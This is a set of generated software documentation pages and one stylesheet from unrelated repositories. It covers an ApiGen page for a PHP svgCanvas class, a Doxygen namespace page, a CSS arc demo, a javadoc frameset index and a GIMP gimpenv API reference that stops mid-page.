<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="generator" content="ApiGen 2.8.0"> <title>Class svgCanvas</title> <script type="text/javascript" src="resources/combined.js?394153670"></script> <script type="text/javascript" src="elementlist.js?961849373"></script> <link rel="stylesheet" type="text/css" media="all" href="resources/style.css?3505392360"> </head> <body> <div id="left"> <div id="menu"> <a href="index.html" title="Overview"><span>Overview</span></a> <div id="groups"> </div> <div id="elements"> <h3>Classes</h3> <ul> <li class="active"><a href="class-svgCanvas.html">svgCanvas</a></li> <li><a href="class-svgCircle.html">svgCircle</a></li> <li><a href="class-svgEllipse.html">svgEllipse</a></li> <li><a href="class-svgObject.html">svgObject</a></li> <li><a href="class-svgRectangle.html">svgRectangle</a></li> <li><a href="class-svgSquare.html">svgSquare</a></li> <li><a href="class-svgText.html">svgText</a></li> <li><a href="class-svgTextBox.html">svgTextBox</a></li> </ul> </div> </div> </div> <div id="splitter"></div> <div id="right"> <div id="rightInner"> <form id="search"> <input type="hidden" name="cx" value=""> <input type="hidden" name="ie" value="UTF-8"> <input type="text" name="q" class="text"> <input type="submit" value="Search"> </form> <div id="navigation"> <ul> <li> <a href="index.html" title="Overview"><span>Overview</span></a> </li> <li class="active"> <span>Class</span> </li> </ul> <ul> <li> <a href="tree.html" title="Tree view of classes, interfaces, traits and exceptions"><span>Tree</span></a> </li> </ul> <ul> </ul> </div> <div id="content" class="class"> <h1>Class svgCanvas</h1> <dl class="tree"> <dd style="padding-left:0px"> <a href="class-svgObject.html"><span>svgObject</span></a> </dd> <dd style="padding-left:30px"> <img src="resources/inherit.png" alt="Extended by"> <b><span>svgCanvas</span></b> </dd> </dl> <div class="info"> <b>Located at</b> <a href="source-class-svgCanvas.html#4-19" title="Go to source code">class.svgCanvas.php</a><br> </div> <table class="summary" id="methods"> <caption>Methods summary</caption> <tr data-order="__construct" id="___construct"> <td class="attributes"><code> public </code> </td> <td class="name"><div> <a class="anchor" href="#___construct">#</a> <code><a href="source-class-svgCanvas.html#7-10" title="Go to source code">__construct</a>( <span>mixed <var>$width</var></span>, <span>mixed <var>$height</var></span> )</code> <div class="description short"> </div> <div class="description detailed hidden"> <h4>Overrides</h4> <div class="list"><code><a href="class-svgObject.html#___construct">svgObject::__construct()</a></code></div> </div> </div></td> </tr> <tr data-order="setXML" id="_setXML"> <td class="attributes"><code> public </code> </td> <td class="name"><div> <a class="anchor" href="#_setXML">#</a> <code><a href="source-class-svgCanvas.html#12-14" title="Go to source code">setXML</a>( <span>mixed <var>$xml</var></span> )</code> <div class="description short"> </div> <div class="description detailed hidden"> </div> </div></td> </tr> <tr data-order="getXML" id="_getXML"> <td class="attributes"><code> public </code> </td> <td class="name"><div> <a class="anchor" href="#_getXML">#</a> <code><a href="source-class-svgCanvas.html#16-18" title="Go to source code">getXML</a>( )</code> <div class="description short"> </div> <div class="description detailed hidden"> </div> </div></td> </tr> </table> <table class="summary inherited"> <caption>Methods inherited from <a href="class-svgObject.html#methods">svgObject</a></caption> <tr> <td><code> <a href="class-svgObject.html#_info">info()</a>, <a href="class-svgObject.html#_setX">setX()</a>, <a href="class-svgObject.html#_setY">setY()</a> </code></td> </tr> </table> <table class="summary inherited"> <caption>Properties inherited from <a href="class-svgObject.html#properties">svgObject</a></caption> <tr> <td><code> <a href="class-svgObject.html#$height"><var>$height</var></a>, <a href="class-svgObject.html#$width"><var>$width</var></a>, <a href="class-svgObject.html#$x"><var>$x</var></a>, <a href="class-svgObject.html#$y"><var>$y</var></a> </code></td> </tr> </table> </div> <div id="footer"> Author: <a href="http://es.linkedin.com/in/madridcrespo/en">CodingFree</a>, License: GNU GPL2</br>API documentation generated by <a href="http://apigen.org">ApiGen 2.8.0</a> </div> </div> </div> </body> </html>
doxygen/html/namespaceuva_1_1utils.html
ivan-zapreev/Back-Off-Language-Model-SMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.10"/> <title>My Project: uva::utils Namespace Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/searchdata.js"></script> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { init_search(); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td id="projectalign" style="padding-left: 0.5em;"> <div id="projectname">My Project </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.10 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li class="current"><a href="namespaces.html"><span>Namespaces</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="namespaces.html"><span>Namespace&#160;List</span></a></li> <li><a href="namespacemembers.html"><span>Namespace&#160;Members</span></a></li> </ul> </div> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> </div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="namespaceuva.html">uva</a></li><li class="navelem"><a class="el" href="namespaceuva_1_1utils.html">utils</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="#namespaces">Namespaces</a> </div> <div class="headertitle"> <div class="title">uva::utils Namespace Reference</div> </div> </div><!--header--> <div class="contents"> <table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="namespaces"></a> Namespaces</h2></td></tr> <tr class="memitem:namespaceuva_1_1utils_1_1math"><td class="memItemLeft" align="right" valign="top"> &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="namespaceuva_1_1utils_1_1math.html">math</a></td></tr> <tr class="separator:"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.10 </small></address> </body> </html>
arcs/arcs.css
dazld/adventures-in-css
@import url(/lib/reset.css); /* #00667f #00a0ba #0051ba #ffcc49 #af7505 #e8112d */ * { box-sizing: border-box; } html { min-height: 100%; xbackground: linear-gradient(#0051ba,#003f87); } #pos { position: absolute; top: 50%; left: 50%; margin-left: -15em; margin-top: -15em; } .arcs { width: 30rem; height: 30rem; background: -webkit-linear-gradient(#00667f 0%, #00667f 16.7%, #00a0ba 16.7%, #00a0ba 33.34%, #0051ba 33.34%, #0051ba 50%, #ffcc49 50%, #ffcc49 66.67%, #af7505 66.67%, #af7505 83.38%, #e8112d 83.38%, #e8112d 100%); xanimation: bgcycle 1s infinite linear alternate; } @keyframes bgcycle { from { transform: rotateY(0deg); } to { transform: rotateY(720deg); } }
aongta_v1.0.0_src/Fuentes y JavaDoc/aon-ql/docs/api/index.html
Esleelkartea/aonGTA
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc on Thu Mar 01 17:42:14 CET 2007--> <TITLE> aon.ql-1.8 API </TITLE> <SCRIPT type="text/javascript"> targetPage = "" + window.location.search; if (targetPage != "" && targetPage != "undefined") targetPage = targetPage.substring(1); function loadFrames() { if (targetPage != "" && targetPage != "undefined") top.classFrame.location = top.targetPage; } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <FRAMESET cols="20%,80%" title="" onLoad="top.loadFrames()"> <FRAMESET rows="30%,70%" title="" onLoad="top.loadFrames()"> <FRAME src="overview-frame.html" name="packageListFrame" title="All Packages"> <FRAME src="allclasses-frame.html" name="packageFrame" title="All classes and interfaces (except non-static nested types)"> </FRAMESET> <FRAME src="overview-summary.html" name="classFrame" title="Package, class and interface descriptions" scrolling="yes"> <NOFRAMES> <H2> Frame Alert</H2> <P> This document is designed to be viewed using the frames feature. If you see this message, you are using a non-frame-capable web client. <BR> Link to<A HREF="overview-summary.html">Non-frame version.</A> </NOFRAMES> </FRAMESET> </HTML>
src/gimp-2.6.12/devel-docs/libgimpbase/html/libgimpbase-gimpenv.html
jdburton/gimp-osx
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>gimpenv</title> <meta name="generator" content="DocBook XSL Stylesheets V1.76.1"> <link rel="home" href="index.html" title="GIMP Base Library Reference Manual"> <link rel="up" href="libgimpbase.html" title="Part I. GIMP Base Library"> <link rel="prev" href="libgimpbase-gimpdatafiles.html" title="gimpdatafiles"> <link rel="next" href="libgimpbase-gimpmemsize.html" title="gimpmemsize"> <meta name="generator" content="GTK-Doc V1.18 (XML mode)"> <link rel="stylesheet" href="style.css" type="text/css"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table class="navigation" id="top" width="100%" summary="Navigation header" cellpadding="2" cellspacing="2"> <tr valign="middle"> <td><a accesskey="p" href="libgimpbase-gimpdatafiles.html"><img src="left.png" width="24" height="24" border="0" alt="Prev"></a></td> <td><a accesskey="u" href="libgimpbase.html"><img src="up.png" width="24" height="24" border="0" alt="Up"></a></td> <td><a accesskey="h" href="index.html"><img src="home.png" width="24" height="24" border="0" alt="Home"></a></td> <th width="100%" align="center">GIMP Base Library Reference Manual</th> <td><a accesskey="n" href="libgimpbase-gimpmemsize.html"><img src="right.png" width="24" height="24" border="0" alt="Next"></a></td> </tr> <tr><td colspan="5" class="shortcuts"> <a href="#libgimpbase-gimpenv.synopsis" class="shortcut">Top</a>  |  <a href="#libgimpbase-gimpenv.description" class="shortcut">Description</a> </td></tr> </table> <div class="refentry"> <a name="libgimpbase-gimpenv"></a><div class="titlepage"></div> <div class="refnamediv"><table width="100%"><tr> <td valign="top"> <h2><span class="refentrytitle"><a name="libgimpbase-gimpenv.top_of_page"></a>gimpenv</span></h2> <p>gimpenv — Functions to access the GIMP environment.</p> </td> <td valign="top" align="right"></td> </tr></table></div> <div class="refsynopsisdiv"> <a name="libgimpbase-gimpenv.synopsis"></a><h2>Synopsis</h2> <pre class="synopsis"><span class="returnvalue">void</span> <a class="link" href="libgimpbase-gimpenv.html#gimp-env-init" title="gimp_env_init ()">gimp_env_init</a> (<em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gboolean"><span class="type">gboolean</span></a> plug_in</code></em>); const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-directory" title="gimp_directory ()">gimp_directory</a> (<em class="parameter"><code><span class="type">void</span></code></em>); const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-data-directory" title="gimp_data_directory ()">gimp_data_directory</a> (<em class="parameter"><code><span class="type">void</span></code></em>); const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-locale-directory" title="gimp_locale_directory ()">gimp_locale_directory</a> (<em class="parameter"><code><span class="type">void</span></code></em>); const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-plug-in-directory" title="gimp_plug_in_directory ()">gimp_plug_in_directory</a> (<em class="parameter"><code><span class="type">void</span></code></em>); const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-sysconf-directory" title="gimp_sysconf_directory ()">gimp_sysconf_directory</a> (<em class="parameter"><code><span class="type">void</span></code></em>); const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-user-directory" title="gimp_user_directory ()">gimp_user_directory</a> (<em class="parameter"><code><a class="link" href="libgimpbase-gimpbaseenums.html#GimpUserDirectory" title="enum GimpUserDirectory"><span class="type">GimpUserDirectory</span></a> type</code></em>); <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-personal-rc-file" title="gimp_personal_rc_file ()">gimp_personal_rc_file</a> (<em class="parameter"><code>const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="type">gchar</span></a> *basename</code></em>); const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-gtkrc" title="gimp_gtkrc ()">gimp_gtkrc</a> (<em class="parameter"><code><span class="type">void</span></code></em>); <a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="returnvalue">GList</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-path-parse" title="gimp_path_parse ()">gimp_path_parse</a> (<em class="parameter"><code>const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="type">gchar</span></a> *path</code></em>, <em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gint"><span class="type">gint</span></a> max_paths</code></em>, <em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gboolean"><span class="type">gboolean</span></a> check</code></em>, <em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="type">GList</span></a> **check_failed</code></em>); <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-path-to-str" title="gimp_path_to_str ()">gimp_path_to_str</a> (<em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="type">GList</span></a> *path</code></em>); <span class="returnvalue">void</span> <a class="link" href="libgimpbase-gimpenv.html#gimp-path-free" title="gimp_path_free ()">gimp_path_free</a> (<em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="type">GList</span></a> *path</code></em>); <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * <a class="link" href="libgimpbase-gimpenv.html#gimp-path-get-user-writable-dir" title="gimp_path_get_user_writable_dir ()">gimp_path_get_user_writable_dir</a> (<em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="type">GList</span></a> *path</code></em>); </pre> </div> <div class="refsect1"> <a name="libgimpbase-gimpenv.description"></a><h2>Description</h2> <p> A set of functions to find the locations of GIMP's data directories and configuration files. </p> </div> <div class="refsect1"> <a name="libgimpbase-gimpenv.details"></a><h2>Details</h2> <div class="refsect2"> <a name="gimp-env-init"></a><h3>gimp_env_init ()</h3> <pre class="programlisting"><span class="returnvalue">void</span> gimp_env_init (<em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gboolean"><span class="type">gboolean</span></a> plug_in</code></em>);</pre> <p> You don't need to care about this function. It is being called for you automatically (by means of the <a href="/usr/share/gtk-doc/html/libgimp/libgimp-gimp.html#MAIN:CAPS"><code class="function">MAIN()</code></a> macro that every plug-in runs). Calling it again will cause a fatal error. </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody><tr> <td><p><span class="term"><em class="parameter"><code>plug_in</code></em> :</span></p></td> <td>must be <a href="http://library.gnome.org/devel/glib/unstable/glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> if this function is called from a plug-in</td> </tr></tbody> </table></div> <p class="since">Since GIMP 2.4</p> </div> <hr> <div class="refsect2"> <a name="gimp-directory"></a><h3>gimp_directory ()</h3> <pre class="programlisting">const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * gimp_directory (<em class="parameter"><code><span class="type">void</span></code></em>);</pre> <p> Returns the user-specific GIMP settings directory. If the environment variable GIMP2_DIRECTORY exists, it is used. If it is an absolute path, it is used as is. If it is a relative path, it is taken to be a subdirectory of the home directory. If it is a relative path, and no home directory can be determined, it is taken to be a subdirectory of <a class="link" href="libgimpbase-gimpenv.html#gimp-data-directory" title="gimp_data_directory ()"><code class="function">gimp_data_directory()</code></a>. </p> <p> The usual case is that no GIMP2_DIRECTORY environment variable exists, and then we use the GIMPDIR subdirectory of the home directory. If no home directory exists, we use a per-user subdirectory of <a class="link" href="libgimpbase-gimpenv.html#gimp-data-directory" title="gimp_data_directory ()"><code class="function">gimp_data_directory()</code></a>. In any case, we always return some non-empty string, whether it corresponds to an existing directory or not. </p> <p> The returned string is owned by GIMP and must not be modified or freed. The returned string is in the encoding used for filenames by GLib, which isn't necessarily UTF-8. (On Windows it always is UTF-8.) </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody><tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>The user-specific GIMP settings directory.</td> </tr></tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="gimp-data-directory"></a><h3>gimp_data_directory ()</h3> <pre class="programlisting">const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * gimp_data_directory (<em class="parameter"><code><span class="type">void</span></code></em>);</pre> <p> Returns the top directory for GIMP data. If the environment variable GIMP2_DATADIR exists, that is used. It should be an absolute pathname. Otherwise, on Unix the compile-time defined directory is used. On Windows, the installation directory as deduced from the executable's full filename is used. </p> <p> The returned string is owned by GIMP and must not be modified or freed. The returned string is in the encoding used for filenames by GLib, which isn't necessarily UTF-8. (On Windows it always is UTF-8.) </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody><tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>The top directory for GIMP data.</td> </tr></tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="gimp-locale-directory"></a><h3>gimp_locale_directory ()</h3> <pre class="programlisting">const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * gimp_locale_directory (<em class="parameter"><code><span class="type">void</span></code></em>);</pre> <p> Returns the top directory for GIMP locale files. If the environment variable GIMP2_LOCALEDIR exists, that is used. It should be an absolute pathname. Otherwise, on Unix the compile-time defined directory is used. On Windows, the installation directory as deduced from the executable's full filename is used. </p> <p> The returned string is owned by GIMP and must not be modified or freed. The returned string is in the encoding used for filenames by the C library, which isn't necessarily UTF-8. (On Windows, unlike the other similar functions here, the return value from this function is in the system codepage, never in UTF-8. It can thus be passed directly to the <code class="function">bindtextdomain()</code> function from libintl which does not handle UTF-8.) </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody><tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>The top directory for GIMP locale files.</td> </tr></tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="gimp-plug-in-directory"></a><h3>gimp_plug_in_directory ()</h3> <pre class="programlisting">const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * gimp_plug_in_directory (<em class="parameter"><code><span class="type">void</span></code></em>);</pre> <p> Returns the top directory for GIMP plug_ins and modules. If the environment variable GIMP2_PLUGINDIR exists, that is used. It should be an absolute pathname. Otherwise, on Unix the compile-time defined directory is used. On Windows, the installation directory as deduced from the executable's full filename is used. </p> <p> The returned string is owned by GIMP and must not be modified or freed. The returned string is in the encoding used for filenames by GLib, which isn't necessarily UTF-8. (On Windows it always is UTF-8.) </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody><tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>The top directory for GIMP plug_ins and modules.</td> </tr></tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="gimp-sysconf-directory"></a><h3>gimp_sysconf_directory ()</h3> <pre class="programlisting">const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * gimp_sysconf_directory (<em class="parameter"><code><span class="type">void</span></code></em>);</pre> <p> Returns the top directory for GIMP config files. If the environment variable GIMP2_SYSCONFDIR exists, that is used. It should be an absolute pathname. Otherwise, on Unix the compile-time defined directory is used. On Windows, the installation directory as deduced from the executable's full filename is used. </p> <p> The returned string is owned by GIMP and must not be modified or freed. The returned string is in the encoding used for filenames by GLib, which isn't necessarily UTF-8. (On Windows it always is UTF-8.). </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody><tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>The top directory for GIMP config files.</td> </tr></tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="gimp-user-directory"></a><h3>gimp_user_directory ()</h3> <pre class="programlisting">const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * gimp_user_directory (<em class="parameter"><code><a class="link" href="libgimpbase-gimpbaseenums.html#GimpUserDirectory" title="enum GimpUserDirectory"><span class="type">GimpUserDirectory</span></a> type</code></em>);</pre> <div class="warning" style="margin-left: 0.5in; margin-right: 0.5in;"> <h3 class="title">Warning</h3> <p><code class="literal">gimp_user_directory</code> is deprecated and should not be used in newly-written code.</p> </div> <p> This procedure is deprecated! Use <a href="http://library.gnome.org/devel/glib/unstable/glib-Miscellaneous-Utility-Functions.html#g-get-user-special-dir"><code class="function">g_get_user_special_dir()</code></a> instead. </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody> <tr> <td><p><span class="term"><em class="parameter"><code>type</code></em> :</span></p></td> <td>the type of user directory to retrieve</td> </tr> <tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>The path to the specified user directory, or <a href="/usr/share/gtk-doc/html/liboil/liboil-liboiljunk.html#NULL:CAPS"><code class="literal">NULL</code></a> if the logical ID was not found.</td> </tr> </tbody> </table></div> <p class="since">Since GIMP 2.4</p> </div> <hr> <div class="refsect2"> <a name="gimp-personal-rc-file"></a><h3>gimp_personal_rc_file ()</h3> <pre class="programlisting"><a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * gimp_personal_rc_file (<em class="parameter"><code>const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="type">gchar</span></a> *basename</code></em>);</pre> <p> Returns the name of a file in the user-specific GIMP settings directory. </p> <p> The returned string is allocated dynamically and *SHOULD* be freed with <a href="http://library.gnome.org/devel/glib/unstable/glib-Memory-Allocation.html#g-free"><code class="function">g_free()</code></a> after use. The returned string is in the encoding used for filenames by GLib, which isn't necessarily UTF-8. (On Windows it always is UTF-8.) </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody> <tr> <td><p><span class="term"><em class="parameter"><code>basename</code></em> :</span></p></td> <td>The basename of a rc_file.</td> </tr> <tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>The name of a file in the user-specific GIMP settings directory.</td> </tr> </tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="gimp-gtkrc"></a><h3>gimp_gtkrc ()</h3> <pre class="programlisting">const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * gimp_gtkrc (<em class="parameter"><code><span class="type">void</span></code></em>);</pre> <p> Returns the name of GIMP's application-specific gtkrc file. </p> <p> The returned string is owned by GIMP and must not be modified or freed. The returned string is in the encoding used for filenames by GLib, which isn't necessarily UTF-8. (On Windows it always is UTF-8.) </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody><tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>The name of GIMP's application-specific gtkrc file.</td> </tr></tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="gimp-path-parse"></a><h3>gimp_path_parse ()</h3> <pre class="programlisting"><a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="returnvalue">GList</span></a> * gimp_path_parse (<em class="parameter"><code>const <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="type">gchar</span></a> *path</code></em>, <em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gint"><span class="type">gint</span></a> max_paths</code></em>, <em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gboolean"><span class="type">gboolean</span></a> check</code></em>, <em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="type">GList</span></a> **check_failed</code></em>);</pre> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody> <tr> <td><p><span class="term"><em class="parameter"><code>path</code></em> :</span></p></td> <td>A list of directories separated by <a href="http://library.gnome.org/devel/glib/unstable/glib-Standard-Macros.html#G-SEARCHPATH-SEPARATOR:CAPS"><span class="type">G_SEARCHPATH_SEPARATOR</span></a>.</td> </tr> <tr> <td><p><span class="term"><em class="parameter"><code>max_paths</code></em> :</span></p></td> <td>The maximum number of directories to return.</td> </tr> <tr> <td><p><span class="term"><em class="parameter"><code>check</code></em> :</span></p></td> <td> <a href="http://library.gnome.org/devel/glib/unstable/glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> if you want the directories to be checked.</td> </tr> <tr> <td><p><span class="term"><em class="parameter"><code>check_failed</code></em> :</span></p></td> <td>Returns a <a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="type">GList</span></a> of path elements for which the check failed.</td> </tr> <tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>A <a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="type">GList</span></a> of all directories in <em class="parameter"><code>path</code></em>.</td> </tr> </tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="gimp-path-to-str"></a><h3>gimp_path_to_str ()</h3> <pre class="programlisting"><a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="returnvalue">gchar</span></a> * gimp_path_to_str (<em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="type">GList</span></a> *path</code></em>);</pre> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody> <tr> <td><p><span class="term"><em class="parameter"><code>path</code></em> :</span></p></td> <td>A list of directories as returned by <a class="link" href="libgimpbase-gimpenv.html#gimp-path-parse" title="gimp_path_parse ()"><code class="function">gimp_path_parse()</code></a>.</td> </tr> <tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>A searchpath string separated by <a href="http://library.gnome.org/devel/glib/unstable/glib-Standard-Macros.html#G-SEARCHPATH-SEPARATOR:CAPS"><span class="type">G_SEARCHPATH_SEPARATOR</span></a>.</td> </tr> </tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="gimp-path-free"></a><h3>gimp_path_free ()</h3> <pre class="programlisting"><span class="returnvalue">void</span> gimp_path_free (<em class="parameter"><code><a href="http://library.gnome.org/devel/glib/unstable/glib-Doubly-Linked-Lists.html#GList"><span class="type">GList</span></a> *path</code></em>);</pre> <p> This function frees the memory allocated for the list and the strings it contains. </p> <div class="variablelist"><table border="0"> <col align="left" valign="top"> <tbody><tr> <td><p><span class="term"><em class="parameter"><code>path</code></em> :</span></p></td> <td>A list of directories as returned by <a class="link" 